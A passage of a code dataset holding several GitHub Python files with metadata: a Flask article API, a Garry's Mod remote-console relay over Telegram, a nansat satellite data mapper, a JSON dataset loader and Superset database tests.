request.get_json()\n # user_id = request_body['user_id']\n article_id = request_body['article_id']\n article_tags = request_body['article_tags']\n article = Article.delete_tag_from_article(\n article_id=article_id,\n article_tags=article_tags)\n return Success(article)\n\n\n@api.route('/edit_article_importance', methods=['POST'])\n@api.doc()\ndef edit_article_importance():\n request_body = request.get_json()\n # user_id = request_body['user_id']\n article_id = request_body['article_id']\n article_importance = request_body['article_importance']\n article = Article.edit_article_importance(\n article_id=article_id,\n article_importance=article_importance)\n return Success(article)\n", "repo_name": "Piiiiiii/SQLAlchemy-Flask-Swagger", "sub_path": "app/api/v1/article.py", "file_name": "article.py", "file_ext": "py", "file_size_in_byte": 2059, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "app.libs.redprint.RedPrint", "line_number": 9, "usage_type": "call"}, {"api_name": "app.api_docs.v1.article", "line_number": 9, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 15, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 15, "usage_type": "name"}, {"api_name": "app.models.article.Article.upload_and_parse_url", "line_number": 19, "usage_type": "call"}, {"api_name": "app.models.article.Article", "line_number": 19, "usage_type": "name"}, {"api_name": "app.libs.error_code.Success", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 28, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 28, "usage_type": "name"}, {"api_name": "app.models.article.Article.create_article", "line_number": 32, "usage_type": "call"}, {"api_name": "app.models.article.Article", "line_number": 32, "usage_type": "name"}, {"api_name": "app.libs.error_code.Success", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 41, "usage_type": "name"}, {"api_name": "app.models.article.Article.delete_tag_from_article", "line_number": 45, "usage_type": "call"}, {"api_name": "app.models.article.Article", "line_number": 45, "usage_type": "name"}, {"api_name": "app.libs.error_code.Success", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 54, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 54, "usage_type": "name"}, {"api_name": "app.models.article.Article.edit_article_importance", "line_number": 58, "usage_type": "call"}, {"api_name": "app.models.article.Article", "line_number": 58, "usage_type": "name"}, {"api_name": "app.libs.error_code.Success", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "18750025261", "text": "\"\"\"Webrequest routines\"\"\"\r\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\r\nfrom urllib.parse import parse_qs\r\nfrom socketserver import ThreadingMixIn\r\nimport time\r\n\r\n\r\nclass Serv(BaseHTTPRequestHandler):\r\n \"\"\"Class Serv\"\"\"\r\n\r\n def do_GET(self):\r\n \"\"\"Handle Get Requests\"\"\"\r\n\r\n client = self.client_address[0]\r\n if client not in self.server.srvhandler.servers:\r\n response = \"you fool\"\r\n self._send_response(response)\r\n print(\"WARNING! Refused connection from \" + client)\r\n return\r\n if self.path == \"/load\":\r\n response = self.server.srvhandler.get_header()\r\n self._send_response(response)\r\n return\r\n\r\n self.server.srvhandler.set_server_time(client, time.time())\r\n\r\n queue = self.server.srvhandler.servers[client]\r\n queue_author = self.server.srvhandler.queue_author[client]\r\n if len(queue) > 0 and len(queue_author) > 0:\r\n\r\n data = queue[0]\r\n cmd, arg = data\r\n\r\n queue_author = self.server.srvhandler.queue_author[client][0]\r\n\r\n if cmd == \"/rcon\":\r\n arg = \"game.ConsoleCommand[[\" + arg + \"\\n]]\"\r\n sent_header = self.server.srvhandler.get_sent_header()\r\n arg = sent_header.replace(\"{USERID}\", str(queue_author)) + arg\r\n arg = arg + \"\\nprint('Message recieved')\\n\"\r\n\r\n print(str(client) + \" << \" + cmd + \" \" + arg)\r\n\r\n response = arg\r\n print(self.server.srvhandler.queue_author[client])\r\n try:\r\n self.server.srvhandler.queue_author[client].pop(0)\r\n self.server.srvhandler.servers[client].pop(0)\r\n except Exception as e:\r\n print(str(e))\r\n else:\r\n response = \"local x = nil\"\r\n self._send_response(response)\r\n\r\n def do_POST(self):\r\n \"\"\"Handle POST Requests\"\"\"\r\n client = self.client_address[0]\r\n if client not in self.server.srvhandler.servers:\r\n print(\"WARNING! Refused POST connection from \" + client)\r\n else:\r\n content_length = int(self.headers['Content-Length'])\r\n post_data = self.rfile.read(content_length)\r\n params = parse_qs(post_data.decode())\r\n try:\r\n if params['message'][0]:\r\n try:\r\n if params['uid'][0]:\r\n self.server.tg.send(\r\n params['uid'][0],\r\n str(client) + \" >> \" + params['message'][0])\r\n except Exception:\r\n print(\"No client ID, reciveing to main\\n\")\r\n print(str(client) + \" >> \" + params['message'][0])\r\n else:\r\n print(\"Invalid postdata from \" + str(client))\r\n except Exception:\r\n print(\"[exception] Invalid postdata from \" + str(client))\r\n self.send_response(200)\r\n self.end_headers()\r\n\r\n def log_message(self, format, *args):\r\n pass\r\n \"\"\"Suspend connetion logs\"\"\"\r\n\r\n def _send_response(self, response):\r\n \"\"\"Send response\"\"\"\r\n self.send_response(200)\r\n self.send_header('Content-type', 'text/html; charset=utf-8')\r\n self.end_headers()\r\n self.wfile.write(bytes(response, 'utf-8'))\r\n\r\n\r\nclass ThreadedHTTPServer(ThreadingMixIn, HTTPServer):\r\n \"\"\"Handle requests in a separate thread.\"\"\"\r\n\r\n def __init__(self, server_address, handler, handler_class=Serv):\r\n super().__init__(server_address, handler_class)\r\n self.srvhandler = handler\r\n\r\n def init_tg(self, handler):\r\n self.tg = handler\r\n", "repo_name": "zuknes/GmodRemoteTelegram", "sub_path": "request_handler.py", "file_name": "request_handler.py", "file_ext": "py", "file_size_in_byte": 3719, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "http.server.BaseHTTPRequestHandler", "line_number": 8, "usage_type": "name"}, {"api_name": "time.time", "line_number": 25, "usage_type": "call"}, {"api_name": "urllib.parse.parse_qs", "line_number": 63, "usage_type": "call"}, {"api_name": "socketserver.ThreadingMixIn", "line_number": 93, "usage_type": "name"}, {"api_name": "http.server.HTTPServer", "line_number": 93, "usage_type": "name"}]} +{"seq_id": "33342255758", "text": "# Name: mapper_obpg_l2\n# Purpose: Mapping for L2 data from the OBPG web-site\n# Authors: Anton Korosov\n# Licence: This file is part of NANSAT. You can redistribute it or modify\n# under the terms of GNU General Public License, v.3\n# http://www.gnu.org/licenses/gpl-3.0.html\nimport os\nfrom datetime import datetime, timedelta\nfrom math import ceil\nimport json\n\nimport pythesint as pti\n\nfrom nansat.utils import gdal, ogr, parse_time\nfrom nansat.exceptions import WrongMapperError\nfrom nansat.vrt import VRT\nfrom nansat.nsr import NSR\n\n\nclass Mapper(VRT):\n ''' Mapper for AMSR-2 L1 data\n\n '''\n\n def __init__(self, filename, gdalDataset, gdalMetadata,\n GCP_STEP=20, MAX_LAT=90, MIN_LAT=50, resolution='low',\n **kwargs):\n ''' Create VRT\n Parameters\n ----------\n GCP_COUNT : int\n number of GCPs along each dimention\n '''\n ifile = os.path.split(filename)[1]\n if not ifile.startswith('GW1AM2_') or not ifile.endswith('.h5'):\n raise WrongMapperError\n try:\n ProductName = gdalMetadata['ProductName']\n PlatformShortName = gdalMetadata['PlatformShortName']\n SensorShortName = gdalMetadata['SensorShortName']\n except:\n raise WrongMapperError\n\n if (not ProductName == 'AMSR2-L1R' or\n not PlatformShortName == 'GCOM-W1' or\n not SensorShortName == 'AMSR2'):\n raise WrongMapperError\n\n if resolution == 'low':\n subDatasetWidth = 243\n else:\n subDatasetWidth = 486\n\n # get GCPs from lon/lat grids\n latGrid = gdal.Open('HDF5:\"%s\"://Latitude_of_Observation_Point_for_89A' % filename).ReadAsArray()\n lonGrid = gdal.Open('HDF5:\"%s\"://Longitude_of_Observation_Point_for_89A' % filename).ReadAsArray()\n if subDatasetWidth == 243:\n latGrid = latGrid[:, ::2]\n lonGrid = lonGrid[:, ::2]\n\n dx = .5\n dy = .5\n gcps = []\n k = 0\n maxY = 0\n minY = latGrid.shape[0]\n for i0 in range(0, latGrid.shape[0], GCP_STEP):\n for i1 in range(0, latGrid.shape[1], GCP_STEP):\n # create GCP with X,Y,pixel,line from lat/lon matrices\n lon = float(lonGrid[i0, i1])\n lat = float(latGrid[i0, i1])\n if (lon >= -180 and\n lon <= 180 and\n lat >= MIN_LAT and\n lat <= MAX_LAT):\n gcp = gdal.GCP(lon, lat, 0, i1 + dx, i0 + dy)\n gcps.append(gcp)\n k += 1\n maxY = max(maxY, i0)\n minY = min(minY, i0)\n yOff = minY\n ySize = maxY - minY\n\n # remove Y-offset from gcps\n for gcp in gcps:\n gcp.GCPLine -= yOff\n\n metaDict = []\n\n subDatasets = gdalDataset.GetSubDatasets()\n metadata = gdalDataset.GetMetadata()\n for subDataset in subDatasets:\n # select subdatasets fro that resolution (width)\n if (subDatasetWidth == int(subDataset[1].split(']')[0].split('x')[-1]) and\n 'Latitude' not in subDataset[0] and 'Longitude' not in subDataset[0]):\n name = subDataset[0].split('/')[-1]\n # find scale\n scale = 1\n for meta in metadata:\n if name + '_SCALE' in meta:\n scale = float(metadata[meta])\n # create meta entry\n metaEntry = {'src': {'SourceFilename': subDataset[0],\n 'sourceBand': 1,\n 'ScaleRatio': scale,\n 'ScaleOffset': 0,\n 'yOff': yOff,\n 'ySize': ySize,},\n 'dst': {'name': name}\n }\n metaDict.append(metaEntry)\n\n # create VRT from one of the subdatasets\n gdalSubDataset = gdal.Open(metaEntry['src']['SourceFilename'])\n self._init_from_dataset_params(subDatasetWidth, ySize, (1,0,0,ySize,0,-1), NSR().wkt)\n # add bands with metadata and corresponding values to the empty VRT\n self.create_bands(metaDict)\n\n self.dataset.SetMetadataItem('time_coverage_start',\n parse_time(gdalMetadata['ObservationStartDateTime']).isoformat())\n self.dataset.SetMetadataItem('time_coverage_end',\n parse_time(gdalMetadata['ObservationEndDateTime']).isoformat())\n # append GCPs and lat/lon projection to the vsiDataset\n self.dataset.SetGCPs(gcps, NSR().wkt)\n self.reproject_gcps('+proj=stere +datum=WGS84 +ellps=WGS84 +lat_0=90 +lon_0=0 +no_defs')\n self.tps = True\n\n mm = pti.get_gcmd_instrument('AMSR2')\n ee = pti.get_gcmd_platform('GCOM-W1')\n self.dataset.SetMetadataItem('instrument', json.dumps(mm))\n self.dataset.SetMetadataItem('platform', json.dumps(ee))\n", "repo_name": "nansencenter/nansat", "sub_path": "nansat/mappers/mapper_amsr2_l1r.py", "file_name": "mapper_amsr2_l1r.py", "file_ext": "py", "file_size_in_byte": 5111, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 170, "dataset": "github-code", "pt": "61", "api": [{"api_name": "nansat.vrt.VRT", "line_number": 20, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "nansat.exceptions.WrongMapperError", "line_number": 36, "usage_type": "name"}, {"api_name": "nansat.exceptions.WrongMapperError", "line_number": 42, "usage_type": "name"}, {"api_name": "nansat.exceptions.WrongMapperError", "line_number": 47, "usage_type": "name"}, {"api_name": "nansat.utils.gdal.Open", "line_number": 55, "usage_type": "call"}, {"api_name": "nansat.utils.gdal", "line_number": 55, "usage_type": "name"}, {"api_name": "nansat.utils.gdal.Open", "line_number": 56, "usage_type": "call"}, {"api_name": "nansat.utils.gdal", "line_number": 56, "usage_type": "name"}, {"api_name": "nansat.utils.gdal.GCP", "line_number": 76, "usage_type": "call"}, {"api_name": "nansat.utils.gdal", "line_number": 76, "usage_type": "name"}, {"api_name": "nansat.utils.gdal.Open", "line_number": 114, "usage_type": "call"}, {"api_name": "nansat.utils.gdal", "line_number": 114, "usage_type": "name"}, {"api_name": "nansat.nsr.NSR", "line_number": 115, "usage_type": "call"}, {"api_name": "nansat.utils.parse_time", "line_number": 120, "usage_type": "call"}, {"api_name": "nansat.utils.parse_time", "line_number": 122, "usage_type": "call"}, {"api_name": "nansat.nsr.NSR", "line_number": 124, "usage_type": "call"}, {"api_name": "pythesint.get_gcmd_instrument", "line_number": 128, "usage_type": "call"}, {"api_name": "pythesint.get_gcmd_platform", "line_number": 129, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 130, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 131, "usage_type": "call"}]} +{"seq_id": "41336209455", "text": "from os.path import join\nimport torch.utils.data\nfrom collections import OrderedDict\nfrom smart_open import open as sopen # Better alternative to Python open().\n\nfrom file_utils import File_Util\nfrom logger import logger\nfrom config import configuration as config\nfrom config import platform as plat\nfrom config import username as user\n\nseed_val = 0\n\n\nclass JSONLoader(torch.utils.data.Dataset):\n \"\"\"\n Class to process and load json files from data directory.\n\n Datasets: AmazonCat-14K\n\n txts : Amazon products title + description after parsing and cleaning.\n txts = {\"id1\": \"azn_ttl_1\", \"id2\": \"azn_ttl_2\"}\n\n sample2cats : OrderedDict of id to sample2cats.\n sample2cats = {\"id1\": [class_id_1,class_id_2],\"id2\": [class_id_2,class_id_10]}\n\n cattext2catid_map : Dict of class texts.\n cattext2catid_map = {\"Computer Science\":class_id_1, \"Machine Learning\":class_id_2}\n\n samples : {\n \"txts\":\"\",\n \"sample2cats\":\"\"\n }\n \"\"\"\n\n def __init__(self, dataset_name=config[\"data\"][\"dataset_name\"], dataset_dir: str = config[\"paths\"][\"dataset_dir\"][plat][user]):\n \"\"\"\n Initializes the JSON loader.\n\n Args:\n dataset_dir : Path to directory of the dataset.\n dataset_name : Name of the dataset.\n \"\"\"\n super(JSONLoader, self).__init__()\n self.dataset_name = dataset_name\n self.dataset_dir = join(dataset_dir, self.dataset_name)\n self.raw_json_dir = join(self.dataset_dir, self.dataset_name + \"_RawData\")\n self.raw_json_file = self.dataset_name + \"_RawData.json\"\n logger.info(\"Dataset name: [{}], Directory: [{}]\".format(self.dataset_name, self.dataset_dir))\n self.txts, self.classes, self.cats = self.gen_dicts(json_path=join(self.raw_json_dir,self.raw_json_file), encoding=\"UTF-8\")\n\n def gen_dicts(self,json_path=None, encoding=config[\"text_process\"][\"encoding\"],specials=\"\"\"_-@*#'\"/\\\\\"\"\", replace=' '):\n \"\"\"\n Generates the data dictionaries from original json file.\n\n :param replace: Character to replace with.\n :param specials: Characters to clean from txts.\n :param json_path: Path to raw json file.\n :param encoding: Encoding for the raw json file.\n :return: txts, sample2cats, cattext2catid_map, no_cat_ids\n no_cat_ids: ids for which no categories were found.\n \"\"\"\n import ast # As the data is not proper JSON (single-quote instead of double-quote) format, \"json\" library will not work.\n from unidecode import unidecode\n\n logger.info(\"Generates the data dictionaries from original json file.\")\n txts = OrderedDict()\n classes = OrderedDict()\n cats = OrderedDict()\n no_cat_ids = [] # To store ids for which no cats were found.\n\n if json_path is None: json_path = self.raw_json_dir\n with sopen(json_path, encoding=encoding) as raw_json_ptr:\n trans_table = File_Util.make_trans_table(specials=specials,replace=replace) # Creating mapping to clean txts.\n cat_idx = 0 # Holds the category index.\n for cnt, line in enumerate(raw_json_ptr):\n # Instead of: line_dict = OrderedDict(json.loads(line));\n # Use: import ast; line_dict = ast.literal_eval(line.strip().replace('\\n','\\\\n'));\n line_dict = ast.literal_eval(line.strip().replace('\\n','\\\\n'))\n if \"categories\" in line_dict: # Check if \"cats\" exists.\n if \"title\" in line_dict: # Check if \"title\" exists, add if True.\n txts[line_dict[\"asin\"]] = unidecode(str(line_dict[\"title\"])).translate(trans_table)\n if \"description\" in line_dict: # Check if \"description\" exists and append to \"title\" with keyword: \". \\nDESC: \", if true.\n txts[line_dict[\"asin\"]] = txts[line_dict[\"asin\"]] + \". \\nDESC: \" + unidecode(str(line_dict[\"description\"])).translate(trans_table)\n else:\n if \"description\" in line_dict: # Check if \"description\" exists even though \"title\" does not, use only \"description\" if true.\n txts[line_dict[\"asin\"]] = \". \\nDESC: \" + line_dict[\"description\"]\n else: # Report and skip the sample if neither \"title\" nor \"description\" exists.\n logger.warning(\"Neither 'title' nor 'description' found for sample id: [{}]. Adding sample to 'no_cat_ids'.\".format(line_dict[\"asin\"]))\n no_cat_ids.append(line_dict[\"asin\"]) # As neither \"title\" nor \"description\" exists, adding the id to \"no_cat_ids\".\n continue\n classes[line_dict[\"asin\"]] = line_dict[\"cats\"][0]\n for lbl in classes[line_dict[\"asin\"]]:\n if lbl not in cats: # If lbl does not exists in cats already, add it and assign a new category index.\n cats[lbl] = cat_idx\n cat_idx += 1\n classes[line_dict[\"asin\"]][classes[line_dict[\"asin\"]].index(lbl)] = cats[lbl] # Replacing cats text to cats id.\n else: # if \"categories\" does not exist, then add the id to \"no_cat_ids\".\n no_cat_ids.append(line_dict[\"asin\"])\n\n File_Util.save_json(no_cat_ids,self.dataset_name + \"_no_cat_ids\",filepath=self.dataset_dir)\n logger.info(\"Number of txts: [{}], sample2cats: [{}] and cattext2catid_map: [{}].\"\n .format(len(txts),len(classes),len(cats)))\n return txts, classes, cats\n\n def get_data(self):\n \"\"\"\n Function to get the entire dataset\n \"\"\"\n return self.txts, self.classes, self.cats\n\n def get_txts(self):\n \"\"\"\n Function to get the entire set of features\n \"\"\"\n return self.txts\n\n def get_classes(self):\n \"\"\"\n Function to get the entire set of sample2cats.\n \"\"\"\n return self.classes\n\n def get_cats(self) -> dict:\n \"\"\"\n Function to get the entire set of cattext2catid_map\n \"\"\"\n return self.cats\n\n\ndef main():\n # config = read_config(args)\n cls = JSONLoader()\n cats_val = cls.get_categories()\n logger.print_dict(cats_val)\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "SamujjwalSam/XC_GCN", "sub_path": "data_loaders/json_loader.py", "file_name": "json_loader.py", "file_ext": "py", "file_size_in_byte": 6333, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.utils.data.utils", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.utils.data", "line_number": 15, "usage_type": "name"}, {"api_name": "config.configuration", "line_number": 36, "usage_type": "name"}, {"api_name": "config.platform", "line_number": 36, "usage_type": "name"}, {"api_name": "config.username", "line_number": 36, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "logger.logger.info", "line_number": 49, "usage_type": "call"}, {"api_name": "logger.logger", "line_number": 49, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "config.configuration", "line_number": 52, "usage_type": "name"}, {"api_name": "logger.logger.info", "line_number": 66, "usage_type": "call"}, {"api_name": "logger.logger", "line_number": 66, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 67, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 68, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 69, "usage_type": "call"}, {"api_name": "smart_open.open", "line_number": 73, "usage_type": "call"}, {"api_name": "file_utils.File_Util.make_trans_table", "line_number": 74, "usage_type": "call"}, {"api_name": "file_utils.File_Util", "line_number": 74, "usage_type": "name"}, {"api_name": "ast.literal_eval", "line_number": 79, "usage_type": "call"}, {"api_name": "unidecode.unidecode", "line_number": 82, "usage_type": "call"}, {"api_name": "unidecode.unidecode", "line_number": 84, "usage_type": "call"}, {"api_name": "logger.logger.warning", "line_number": 89, "usage_type": "call"}, {"api_name": "logger.logger", "line_number": 89, "usage_type": "name"}, {"api_name": "file_utils.File_Util.save_json", "line_number": 101, "usage_type": "call"}, {"api_name": "file_utils.File_Util", "line_number": 101, "usage_type": "name"}, {"api_name": "logger.logger.info", "line_number": 102, "usage_type": "call"}, {"api_name": "logger.logger", "line_number": 102, "usage_type": "name"}, {"api_name": "{'ast': 'ast', 'unidecode': 'unidecode.unidecode'}", "line_number": 133, "usage_type": "call"}, {"api_name": "logger.logger.print_dict", "line_number": 135, "usage_type": "call"}, {"api_name": "logger.logger", "line_number": 135, "usage_type": "name"}]} +{"seq_id": "25169164135", "text": "from textwrap import dedent\nfrom typing import Any, Optional\n\nimport pytest\nfrom sqlalchemy import types\n\nfrom superset.superset_typing import ResultSetColumnType, SQLAColumnType\nfrom superset.utils.core import GenericDataType\nfrom tests.unit_tests.db_engine_specs.utils import assert_column_spec\n\n\ndef test_get_text_clause_with_colon() -> None:\n \"\"\"\n Make sure text clauses are correctly escaped\n \"\"\"\n\n from superset.db_engine_specs.base import BaseEngineSpec\n\n text_clause = BaseEngineSpec.get_text_clause(\n \"SELECT foo FROM tbl WHERE foo = '123:456')\"\n )\n assert text_clause.text == \"SELECT foo FROM tbl WHERE foo = '123\\\\:456')\"\n\n\ndef test_parse_sql_single_statement() -> None:\n \"\"\"\n `parse_sql` should properly strip leading and trailing spaces and semicolons\n \"\"\"\n\n from superset.db_engine_specs.base import BaseEngineSpec\n\n queries = BaseEngineSpec.parse_sql(\" SELECT foo FROM tbl ; \")\n assert queries == [\"SELECT foo FROM tbl\"]\n\n\ndef test_parse_sql_multi_statement() -> None:\n \"\"\"\n For string with multiple SQL-statements `parse_sql` method should return list\n where each element represents the single SQL-statement\n \"\"\"\n\n from superset.db_engine_specs.base import BaseEngineSpec\n\n queries = BaseEngineSpec.parse_sql(\"SELECT foo FROM tbl1; SELECT bar FROM tbl2;\")\n assert queries == [\n \"SELECT foo FROM tbl1\",\n \"SELECT bar FROM tbl2\",\n ]\n\n\n@pytest.mark.parametrize(\n \"original,expected\",\n [\n (\n dedent(\n \"\"\"\nwith currency as\n(\nselect 'INR' as cur\n)\nselect * from currency\n\"\"\"\n ),\n None,\n ),\n (\n \"SELECT 1 as cnt\",\n None,\n ),\n (\n dedent(\n \"\"\"\nselect 'INR' as cur\nunion\nselect 'AUD' as cur\nunion\nselect 'USD' as cur\n\"\"\"\n ),\n None,\n ),\n ],\n)\ndef test_cte_query_parsing(original: types.TypeEngine, expected: str) -> None:\n from superset.db_engine_specs.base import BaseEngineSpec\n\n actual = BaseEngineSpec.get_cte_query(original)\n assert actual == expected\n\n\n@pytest.mark.parametrize(\n \"native_type,sqla_type,attrs,generic_type,is_dttm\",\n [\n (\"SMALLINT\", types.SmallInteger, None, GenericDataType.NUMERIC, False),\n (\"INTEGER\", types.Integer, None, GenericDataType.NUMERIC, False),\n (\"BIGINT\", types.BigInteger, None, GenericDataType.NUMERIC, False),\n (\"DECIMAL\", types.Numeric, None, GenericDataType.NUMERIC, False),\n (\"NUMERIC\", types.Numeric, None, GenericDataType.NUMERIC, False),\n (\"REAL\", types.REAL, None, GenericDataType.NUMERIC, False),\n (\"DOUBLE PRECISION\", types.Float, None, GenericDataType.NUMERIC, False),\n (\"MONEY\", types.Numeric, None, GenericDataType.NUMERIC, False),\n # String\n (\"CHAR\", types.String, None, GenericDataType.STRING, False),\n (\"VARCHAR\", types.String, None, GenericDataType.STRING, False),\n (\"TEXT\", types.String, None, GenericDataType.STRING, False),\n # Temporal\n (\"DATE\", types.Date, None, GenericDataType.TEMPORAL, True),\n (\"TIMESTAMP\", types.TIMESTAMP, None, GenericDataType.TEMPORAL, True),\n (\"TIME\", types.Time, None, GenericDataType.TEMPORAL, True),\n # Boolean\n (\"BOOLEAN\", types.Boolean, None, GenericDataType.BOOLEAN, False),\n ],\n)\ndef test_get_column_spec(\n native_type: str,\n sqla_type: type[types.TypeEngine],\n attrs: Optional[dict[str, Any]],\n generic_type: GenericDataType,\n is_dttm: bool,\n) -> None:\n from superset.db_engine_specs.databricks import DatabricksNativeEngineSpec as spec\n\n assert_column_spec(spec, native_type, sqla_type, attrs, generic_type, is_dttm)\n\n\n@pytest.mark.parametrize(\n \"cols, expected_result\",\n [\n (\n [SQLAColumnType(name=\"John\", type=\"integer\", is_dttm=False)],\n [\n ResultSetColumnType(\n column_name=\"John\", name=\"John\", type=\"integer\", is_dttm=False\n )\n ],\n ),\n (\n [SQLAColumnType(name=\"hugh\", type=\"integer\", is_dttm=False)],\n [\n ResultSetColumnType(\n column_name=\"hugh\", name=\"hugh\", type=\"integer\", is_dttm=False\n )\n ],\n ),\n ],\n)\ndef test_convert_inspector_columns(\n cols: list[SQLAColumnType], expected_result: list[ResultSetColumnType]\n):\n from superset.db_engine_specs.base import convert_inspector_columns\n\n assert convert_inspector_columns(cols) == expected_result\n", "repo_name": "apache/superset", "sub_path": "tests/unit_tests/db_engine_specs/test_base.py", "file_name": "test_base.py", "file_ext": "py", "file_size_in_byte": 4578, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 55269, "dataset": "github-code", "pt": "61", "api": [{"api_name": "superset.db_engine_specs.base.BaseEngineSpec.get_text_clause", "line_number": 19, "usage_type": "call"}, {"api_name": "superset.db_engine_specs.base.BaseEngineSpec", "line_number": 19, "usage_type": "name"}, {"api_name": "superset.db_engine_specs.base.BaseEngineSpec.parse_sql", "line_number": 32, "usage_type": "call"}, {"api_name": "superset.db_engine_specs.base.BaseEngineSpec", "line_number": 32, "usage_type": "name"}, {"api_name": "superset.db_engine_specs.base.BaseEngineSpec.parse_sql", "line_number": 44, "usage_type": "call"}, {"api_name": "superset.db_engine_specs.base.BaseEngineSpec", "line_number": 44, "usage_type": "name"}, {"api_name": "sqlalchemy.types.TypeEngine", "line_number": 84, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 84, "usage_type": "name"}, {"api_name": "superset.db_engine_specs.base.BaseEngineSpec.get_cte_query", "line_number": 87, "usage_type": "call"}, {"api_name": "superset.db_engine_specs.base.BaseEngineSpec", "line_number": 87, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 51, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 51, "usage_type": "attribute"}, {"api_name": "textwrap.dedent", "line_number": 55, "usage_type": "call"}, {"api_name": "textwrap.dedent", "line_number": 71, "usage_type": "call"}, {"api_name": "sqlalchemy.types.TypeEngine", "line_number": 116, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 116, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 117, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 117, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 118, "usage_type": "name"}, {"api_name": "tests.unit_tests.db_engine_specs.utils.assert_column_spec", "line_number": 123, "usage_type": "call"}, {"api_name": "superset.db_engine_specs.databricks.DatabricksNativeEngineSpec", "line_number": 123, "usage_type": "argument"}, {"api_name": "pytest.mark.parametrize", "line_number": 91, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 91, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types.SmallInteger", "line_number": 94, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 94, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.NUMERIC", "line_number": 94, "usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 94, "usage_type": "name"}, {"api_name": "sqlalchemy.types.Integer", "line_number": 95, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 95, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.NUMERIC", "line_number": 95, "usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 95, "usage_type": "name"}, {"api_name": "sqlalchemy.types.BigInteger", "line_number": 96, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 96, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.NUMERIC", "line_number": 96, "usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 96, "usage_type": "name"}, {"api_name": "sqlalchemy.types.Numeric", "line_number": 97, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 97, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.NUMERIC", "line_number": 97, "usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 97, "usage_type": "name"}, {"api_name": "sqlalchemy.types.Numeric", "line_number": 98, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 98, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.NUMERIC", "line_number": 98, "usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 98, "usage_type": "name"}, {"api_name": "sqlalchemy.types.REAL", "line_number": 99, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 99, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.NUMERIC", "line_number": 99, "usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 99, "usage_type": "name"}, {"api_name": "sqlalchemy.types.Float", "line_number": 100, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 100, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.NUMERIC", "line_number": 100, "usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 100, "usage_type": "name"}, {"api_name": "sqlalchemy.types.Numeric", "line_number": 101, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 101, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.NUMERIC", "line_number": 101, "usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 101, "usage_type": "name"}, {"api_name": "sqlalchemy.types.String", "line_number": 103, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 103, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.STRING", "line_number": 103, "usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 103, "usage_type": "name"}, {"api_name": "sqlalchemy.types.String", "line_number": 104, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 104, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.STRING", "line_number": 104, "usage_type": 